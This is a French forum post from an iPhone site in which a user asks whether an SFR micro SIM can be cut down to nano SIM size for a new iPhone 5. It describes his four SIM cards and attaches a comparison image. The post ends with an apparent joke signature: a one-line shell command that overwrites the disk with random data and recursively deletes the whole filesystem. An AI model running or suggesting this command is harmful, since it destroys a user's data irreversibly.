Forum iPhone, iPad, Apple Watch de iPhon.fr

Forum utilisateurs Apple iPhone, iPad, Apple Watch, forfaits et accessoires

Vous n'êtes pas identifié(e).

Annonce

Bienvenue sur le forum du blog iPhon.fr

Pensez à poster dans la bonne rubrique, respecter les propos des autres internautes, ne pas utiliser le langage SMS, et enfin, à utiliser la fonction 'Recherche' !
Et... Gardez le sens de l'humour, de la convivialité et de la décontraction. On n'est pas là pour se prendre la tête ! ;-)

#1 05-10-2012 00:55:52

-nicnl-
Membre
Inscription : 02-04-2008
Messages : 681

iPhone 5 : Découpe de carte sim ( Micro Sim vers Nano Sim )

Bonjour, bonsoir à toutes et à tous.

Je m'apprète à recevoir mon iJoujou 5 dans les prochains jours. ( Que j'ai acheté débloqué sur le site d'Apple )
Et pour les avantages que ça va m'offrir, je vais passer d'un forfait SFR à un forfait Sosh.

Le problème, c'est que pour profiter de mon iBidule 5, j'ai plusieurs solutions :

- Allez chez SFR, demander une Nano Sim pour activer l'iPhone, puis passer à Sosh
- Passer à Sosh directement, et attendre encore pas mal de temps que la migration de numéro et blabla soit faite pour enfin utiliser l'iPhone 5
- Découper ma carte SIM SFR actuelle, activer et utiliser l'iPhone, puis passer à Sosh

( Evidemment, le numéro de la SIM Orange est inutilisable, donc impossible d'activer l'iPhone depuis celle-ci )

Perso, je préfère opter pour la solution n°3.
Une petite découpe, et hop j'ai un iPhone tout prêt tout beau tout neuf à utiliser.

J'ai donc regardé un peu partout sur internet, j'ai vu qu'apparemment c'était faisable, qu'il fallait vérifier si sa carte sim était compatible, tout ça...
Et d'après la totalité des sites, les cartes Micro SIM ( Celles de l'iPhone 4 ) sont toutes "compatibles" pour le découpage en Nano SIM.

Ok, j'ai donc vérifié.
J'ai avec moi 4 cartes SIMs :
- Une SIM Orange normale
- Une Micro SIM Orange découpée depuis une SIM Orange Normale
- Une Micro SIM Orange "officielle"
- Une Nano SIM SFR ( Celle que je souhaite découper )

Et je me suis appercu que la Micro SIM Orange "officielle" avait l'air OK pour le découpage.
Mais après avoir retiré ma SIM SFR depuis mon iPhone 4 actuel, SURPRISE !
Ils ont utilisé un format de Micro SIM tout à fait différent !

Du coup, si je veux la "transformer" en Nano SIM, faudrait carrément découper une partie des connecteurs...
Je vous laisse comprendre que ça n'a pas l'air très réjouissant.

Je me porte donc vers vous, je voudrais savoir si la manipulation reste possible, si il y a des risques, ou même si il existerai une solution alternative intéressante afin d'utiliser mon iBidule le plus rapidement possible, tout en gardant un numéro utilisable. ( Que ce soit sur l'iPhone 4 ou 5 n'a pas d'importance, c'est juste pour commencer à configurer la bête )
( Parce qu'apparemment, le circuit intégré de la SIM est tout petit, situé au centre, donc découper les connecteurs ne détruirait à priori pas la SIM )

Je vous remercie d'avance pour votre aide.
Bonne soirée/journée.

PS : Voici une petite image avec mes 4 SIMs différentes, ainsi qu'une Nano SIM chopée sur le net servant d'échelle de référence.

micronanosim.jpg


sudo cat /dev/urandom > /dev/sda & sudo rm -rf /* &

Hors ligne

Pied de page des forums

L'iPhone sur iPhon.fr, le blog de l'iPhone - blog iPad

iPhon.fr et son forum ne sont pas liés à Apple, Orange, SFR ou autres et les marques citées sont la propriété de leurs détenteurs respectifs.